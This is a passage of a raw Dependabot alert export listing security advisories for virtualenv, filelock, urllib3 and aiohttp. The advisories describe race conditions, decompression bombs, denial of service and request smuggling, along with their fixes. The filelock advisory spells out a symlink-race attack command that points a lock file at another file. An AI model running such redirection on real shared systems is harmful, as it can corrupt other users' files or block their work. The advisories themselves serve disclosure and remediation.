An attacker with local access can exploit a race condition between directory existence checks and creation to redirect virtualenv's app_data and lock file operations to attacker-controlled locations.\n\n**Affected versions:** All versions up to and including 20.36.1\n\n**Affected users:** Any user running `virtualenv` on multi-user systems where untrusted local users have filesystem access to shared temporary directories or where `VIRTUALENV_OVERRIDE_APP_DATA` points to a user-writable location.\n\n**Attack scenarios:**\n- Cache poisoning: Attacker corrupts wheels or Python metadata in the cache\n- Information disclosure: Attacker reads sensitive cached data or metadata\n- Lock bypass: Attacker controls lock file semantics to cause concurrent access violations\n- Denial of service: Lock starvation preventing virtualenv operations\n\n## Patches\n\nThe vulnerability has been patched by replacing check-then-act patterns with atomic `os.makedirs(..., exist_ok=True)` operations.\n\n**Fixed in:** PR #3013\n\n**Versions with the fix:** 20.36.2 and later\n\nUsers should upgrade to version 20.36.2 or later.\n\n## Workarounds\n\nIf you cannot upgrade immediately:\n\n1. Ensure `VIRTUALENV_OVERRIDE_APP_DATA` points to a directory owned by the current user with restricted permissions (mode 0700)\n2. Avoid running `virtualenv` in shared temporary directories where other users have write access\n3. 
Use separate user accounts for different projects to isolate app_data directories\n\n## References\n\n- GitHub PR: https://github.com/pypa/virtualenv/pull/3013\n- Vulnerability reported by: @tsigouris007\n- CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (TOCTOU)\n- CWE-59: Improper Link Resolution Before File Access","severity":"medium","identifiers":[{"value":"GHSA-597g-3phw-6986","type":"GHSA"},{"value":"CVE-2026-22702","type":"CVE"}],"references":[{"url":"https://github.com/pypa/virtualenv/security/advisories/GHSA-597g-3phw-6986"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22702"},{"url":"https://github.com/pypa/virtualenv/pull/3013"},{"url":"https://github.com/pypa/virtualenv/commit/dec4cec5d16edaf83a00a658f32d1e032661cebc"},{"url":"https://github.com/advisories/GHSA-597g-3phw-6986"}],"published_at":"2026-01-13T18:45:57Z","updated_at":"2026-01-13T18:45:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"virtualenv"},"severity":"medium","vulnerable_version_range":"< 20.36.1","first_patched_version":{"identifier":"20.36.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L","score":4.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00016,"percentile":0.03803},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L","score":4.5},"cwes":[{"cwe_id":"CWE-59","name":"Improper Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-362","name":"Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"virtualenv"},"severity":"medium","vulnerable_version_range":"< 
20.36.1","first_patched_version":{"identifier":"20.36.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/80","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/80","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":79,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"filelock"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-qmgc-5h2g-mvrw","cve_id":"CVE-2026-22701","summary":"filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock","description":"## Vulnerability Summary\n\n**Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock\n\n**Affected Component:** `filelock` package - `SoftFileLock` class\n**File:** `src/filelock/_soft.py` lines 17-27\n**CWE:** CWE-362, CWE-367, CWE-59\n\n---\n\n## Description\n\nA TOCTOU race condition vulnerability exists in the `SoftFileLock` implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly.\n\nThe vulnerability occurs in the `_acquire()` method between `raise_on_not_writable_file()` (permission check) and `os.open()` (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service.\n\n### Attack Scenario\n\n```\n1. Lock attempts to acquire on /tmp/app.lock\n2. Permission validation passes\n3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock\n4. os.open() tries to create lock file\n5. 
Lock operates on attacker-controlled target file or fails\n```\n\n---\n\n## Impact\n\n_What kind of vulnerability is it? Who is impacted?_\n\nThis is a **Time-of-Check-Time-of-Use (TOCTOU) race condition vulnerability** affecting any application using `SoftFileLock` for inter-process synchronization.\n\n**Affected Users:**\n- Applications using `filelock.SoftFileLock` directly\n- Applications using the fallback `FileLock` on systems without `fcntl` support (e.g., GraalPy)\n\n**Consequences:**\n- **Silent lock acquisition failure** - applications may not detect that exclusive resource access is not guaranteed\n- **Denial of Service** - attacker can prevent lock file creation by maintaining symlink\n- **Resource serialization failures** - multiple processes may acquire \"locks\" simultaneously\n- **Unintended file operations** - lock could operate on attacker-controlled files\n\n**CVSS v4.0 Score:** 5.6 (Medium)\n**Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N\n\n**Attack Requirements:**\n- Local filesystem access to the directory containing lock files\n- Permission to create symlinks (standard for regular unprivileged users on Unix/Linux)\n- Ability to time the symlink creation during the narrow race window\n\n---\n\n## Patches\n\n_Has the problem been patched? 
What versions should users upgrade to?_\n\nYes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag to prevent symlink following during lock file creation.\n\n**Patched Version:** Next release (commit: 255ed068bc85d1ef406e50a135e1459170dd1bf0)\n\n**Mitigation Details:**\n- The `O_NOFOLLOW` flag is added conditionally and gracefully degrades on platforms without support\n- On platforms with `O_NOFOLLOW` support (most modern systems): symlink attacks are completely prevented\n- On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window remains but is documented\n\n**Users should:**\n- Upgrade to the patched version when available\n- For critical deployments, consider using `UnixFileLock` or `WindowsFileLock` instead of the fallback `SoftFileLock`\n\n---\n\n## Workarounds\n\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nFor users unable to update immediately:\n\n1. **Avoid `SoftFileLock` in security-sensitive contexts** - use `UnixFileLock` or `WindowsFileLock` when available (these were already patched for CVE-2025-68146)\n\n2. **Restrict filesystem permissions** - prevent untrusted users from creating symlinks in lock file directories:\n ```bash\n chmod 700 /path/to/lock/directory\n ```\n\n3. **Use process isolation** - isolate untrusted code from lock file paths to prevent symlink creation\n\n4. 
**Monitor lock operations** - implement application-level checks to verify lock acquisitions are successful before proceeding with critical operations\n\n---\n\n## References\n\n_Are there any links users can visit to find out more?_\n\n- **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in UnixFileLock/WindowsFileLock)\n- **CWE-362 (Concurrent Execution using Shared Resource):** https://cwe.mitre.org/data/definitions/362.html\n- **CWE-367 (Time-of-check Time-of-use Race Condition):** https://cwe.mitre.org/data/definitions/367.html\n- **CWE-59 (Improper Link Resolution Before File Access):** https://cwe.mitre.org/data/definitions/59.html\n- **O_NOFOLLOW documentation:** https://man7.org/linux/man-pages/man2/open.2.html\n- **GitHub Repository:** https://github.com/tox-dev/filelock\n\n---\n\n**Reported by:** George Tsigourakos (@tsigouris007)","severity":"medium","identifiers":[{"value":"GHSA-qmgc-5h2g-mvrw","type":"GHSA"},{"value":"CVE-2026-22701","type":"CVE"}],"references":[{"url":"https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22701"},{"url":"https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0"},{"url":"https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5"},{"url":"https://github.com/advisories/GHSA-qmgc-5h2g-mvrw"}],"published_at":"2026-01-13T18:44:55Z","updated_at":"2026-01-13T18:44:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.3","first_patched_version":{"identifier":"3.20.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":6.0e-05,"percentile":0.00422},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H","score":5.3},"cwes":[{"cwe_id":"CWE-59","name":"Improper 
Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-362","name":"Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"},{"cwe_id":"CWE-367","name":"Time-of-check Time-of-use (TOCTOU) Race Condition"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.3","first_patched_version":{"identifier":"3.20.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/79","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/79","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":78,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-38jv-5279-wg99","cve_id":"CVE-2026-21441","summary":"Decompression-bomb safeguards bypassed when following HTTP redirects (streaming API)","description":"### Impact\n\nurllib3's [streaming API](https://urllib3.readthedocs.io/en/2.6.2/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nurllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption.\n\nHowever, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. 
This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client (high CPU usage and large memory allocations for decompressed data; CWE-409).\n\n### Affected usages\n\nApplications and libraries using urllib3 version 2.6.2 and earlier to stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects.\n\n\n### Remediation\n\nUpgrade to at least urllib3 v2.6.3 in which the library does not decode content of redirect responses when `preload_content=False`.\n\nIf upgrading is not immediately possible, disable [redirects](https://urllib3.readthedocs.io/en/2.6.2/user-guide.html#retrying-requests) by setting `redirect=False` for requests to untrusted source.","severity":"high","identifiers":[{"value":"GHSA-38jv-5279-wg99","type":"GHSA"},{"value":"CVE-2026-21441","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99"},{"url":"https://github.com/urllib3/urllib3/commit/8864ac407bba8607950025e0979c4c69bc7abc7b"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-21441"},{"url":"https://lists.debian.org/debian-lts-announce/2026/01/msg00017.html"},{"url":"https://github.com/advisories/GHSA-38jv-5279-wg99"}],"published_at":"2026-01-07T19:18:14Z","updated_at":"2026-01-23T16:05:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.22, < 
2.6.3","first_patched_version":{"identifier":"2.6.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H","score":8.9}},"epss":{"percentage":0.00032,"percentile":0.0921},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-409","name":"Improper Handling of Highly Compressed Data (Data Amplification)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.22, < 2.6.3","first_patched_version":{"identifier":"2.6.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/78","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/78","created_at":"2026-05-13T05:27:13Z","updated_at":"2026-05-13T05:27:13Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":77,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-fh55-r93g-j68g","cve_id":"CVE-2025-69230","summary":"AIOHTTP Vulnerable to Cookie Parser Warning Storm","description":"### Summary\nReading multiple invalid cookies can lead to a logging storm.\n\n### Impact\nIf the ``cookies`` attribute is accessed in an application, then an attacker may be able to trigger a storm of warning-level logs using a specially crafted Cookie header.\n\n----\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326","severity":"low","identifiers":[{"value":"GHSA-fh55-r93g-j68g","type":"GHSA"},{"value":"CVE-2025-69230","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-fh55-r93g-j68g"},{"url":"https://github.com/aio-libs/aiohttp/commit/64629a0834f94e46d9881f4e99c41a137e1f3326"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69230"},{"url":"https://github.com/advisories/GHSA-fh55-r93g-j68g"}],"published_at":"2026-01-05T23:13:46Z","updated_at":"2026-01-06T16:07:05Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00015,"percentile":0.03409},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-779","name":"Logging of Excessive Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/77","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/77","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":76,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-g84x-mcqj-x9qq","cve_id":"CVE-2025-69229","summary":"AIOHTTP vulnerable to DoS 
through chunked messages","description":"### Summary\n\nHandling of chunked messages can result in excessive blocking CPU usage when receiving a large number of chunks.\n\n### Impact\n\nIf an application makes use of the `request.read()` method in an endpoint, it may be possible for an attacker to cause the server to spend a moderate amount of blocking CPU time (e.g. 1 second) while processing the request. This could potentially lead to DoS as the server would be unable to handle other requests during that time.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712\nPatch: https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229","severity":"medium","identifiers":[{"value":"GHSA-g84x-mcqj-x9qq","type":"GHSA"},{"value":"CVE-2025-69229","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-g84x-mcqj-x9qq"},{"url":"https://github.com/aio-libs/aiohttp/commit/4ed97a4e46eaf61bd0f05063245f613469700229"},{"url":"https://github.com/aio-libs/aiohttp/commit/dc3170b56904bdf814228fae70a5501a42a6c712"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69229"},{"url":"https://github.com/advisories/GHSA-g84x-mcqj-x9qq"}],"published_at":"2026-01-05T23:13:29Z","updated_at":"2026-01-06T16:07:01Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00067,"percentile":0.20533},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or 
Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/76","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/76","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":75,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-6jhg-hg63-jvvf","cve_id":"CVE-2025-69228","summary":"AIOHTTP vulnerable to denial of service through large payloads","description":"### Summary\nA request can be crafted in such a way that an aiohttp server's memory fills up uncontrollably during processing.\n\n### Impact\nIf an application includes a handler that uses the `Request.post()` method, an attacker may be able to freeze the server by exhausting the memory.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60","severity":"medium","identifiers":[{"value":"GHSA-6jhg-hg63-jvvf","type":"GHSA"},{"value":"CVE-2025-69228","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6jhg-hg63-jvvf"},{"url":"https://github.com/aio-libs/aiohttp/commit/b7dbd35375aedbcd712cbae8ad513d56d11cce60"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69228"},{"url":"https://github.com/advisories/GHSA-6jhg-hg63-jvvf"}],"published_at":"2026-01-05T23:13:14Z","updated_at":"2026-01-08T12:17:13Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 
3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00082,"percentile":0.23714},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/75","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/75","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":74,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-jj3x-wxrx-4x23","cve_id":"CVE-2025-69227","summary":"AIOHTTP vulnerable to DoS when bypassing asserts","description":"### Summary\nWhen assert statements are bypassed, an infinite loop can occur, resulting in a DoS attack when processing a POST body.\n\n### Impact\nIf optimisations are enabled (`-O` or `PYTHONOPTIMIZE=1`), and the application includes a handler that uses the `Request.post()` method, then an attacker may be able to execute a DoS attack with a specially crafted message.\n\n------\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/bc1319ec3cbff9438a758951a30907b072561259","severity":"medium","identifiers":[{"value":"GHSA-jj3x-wxrx-4x23","type":"GHSA"},{"value":"CVE-2025-69227","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jj3x-wxrx-4x23"},{"url":"https://github.com/aio-libs/aiohttp/commit/bc1319ec3cbff9438a758951a30907b072561259"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69227"},{"url":"https://github.com/advisories/GHSA-jj3x-wxrx-4x23"}],"published_at":"2026-01-05T23:10:15Z","updated_at":"2026-01-06T16:06:51Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00082,"percentile":0.23714},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-835","name":"Loop with Unreachable Exit Condition ('Infinite Loop')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 
3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/74","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/74","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":73,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-54jq-c3m8-4m76","cve_id":"CVE-2025-69226","summary":"AIOHTTP vulnerable to brute-force leak of internal static file path components","description":"### Summary\nPath normalization for static files prevents path traversal, but opens up the ability for an attacker to ascertain the\nexistence of absolute path components.\n\n### Impact\nIf an application uses `web.static()` (not recommended for production deployments), it may be possible for an attacker to ascertain the existence of path components.\n\n------\n\nPatch: https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e","severity":"low","identifiers":[{"value":"GHSA-54jq-c3m8-4m76","type":"GHSA"},{"value":"CVE-2025-69226","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-54jq-c3m8-4m76"},{"url":"https://github.com/aio-libs/aiohttp/commit/f2a86fd5ac0383000d1715afddfa704413f0711e"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69226"},{"url":"https://github.com/advisories/GHSA-54jq-c3m8-4m76"}],"published_at":"2026-01-05T23:09:51Z","updated_at":"2026-01-06T16:06:50Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.0007,"percentile":0.2125},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"},{"cwe_id":"CWE-202","name":"Exposure of Sensitive Information Through Data Queries"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/73","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/73","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":72,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mqqc-3gqh-h2x8","cve_id":"CVE-2025-69225","summary":"AIOHTTP has unicode match groups in regexes for ASCII protocol elements","description":"### Summary\n\nThe parser allows non-ASCII decimals to be present in the Range header.\n\n### Impact\n\nThere is no known impact, but there is the possibility that there's a method to exploit a request smuggling vulnerability.\n\n----\n\nPatch: 
https://github.com/aio-libs/aiohttp/commit/c7b7a044f88c71cefda95ec75cdcfaa4792b3b96","severity":"low","identifiers":[{"value":"GHSA-mqqc-3gqh-h2x8","type":"GHSA"},{"value":"CVE-2025-69225","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mqqc-3gqh-h2x8"},{"url":"https://github.com/aio-libs/aiohttp/commit/c7b7a044f88c71cefda95ec75cdcfaa4792b3b96"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69225"},{"url":"https://github.com/advisories/GHSA-mqqc-3gqh-h2x8"}],"published_at":"2026-01-05T23:09:30Z","updated_at":"2026-01-06T16:06:45Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00056,"percentile":0.17169},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-444","name":"Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/72","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/72","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":71,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-69f9-5gxw-wvc2","cve_id":"CVE-2025-69224","summary":"AIOHTTP's unicode processing of header values could cause parsing discrepancies","description":"### Summary\nThe Python HTTP parser may allow a request smuggling attack with the presence of non-ASCII characters.\n\n### Impact\nIf a pure Python version of aiohttp is installed (i.e. without the usual C extensions) or AIOHTTP_NO_EXTENSIONS is enabled, then an attacker may be able to execute a request smuggling attack to bypass certain firewalls or proxy protections.\n\n------\n\nPatch: https://github.com/aio-libs/aiohttp/commit/32677f2adfd907420c078dda6b79225c6f4ebce0","severity":"low","identifiers":[{"value":"GHSA-69f9-5gxw-wvc2","type":"GHSA"},{"value":"CVE-2025-69224","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-69f9-5gxw-wvc2"},{"url":"https://github.com/aio-libs/aiohttp/commit/32677f2adfd907420c078dda6b79225c6f4ebce0"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69224"},{"url":"https://github.com/advisories/GHSA-69f9-5gxw-wvc2"}],"published_at":"2026-01-05T22:58:57Z","updated_at":"2026-01-06T16:06:41Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 
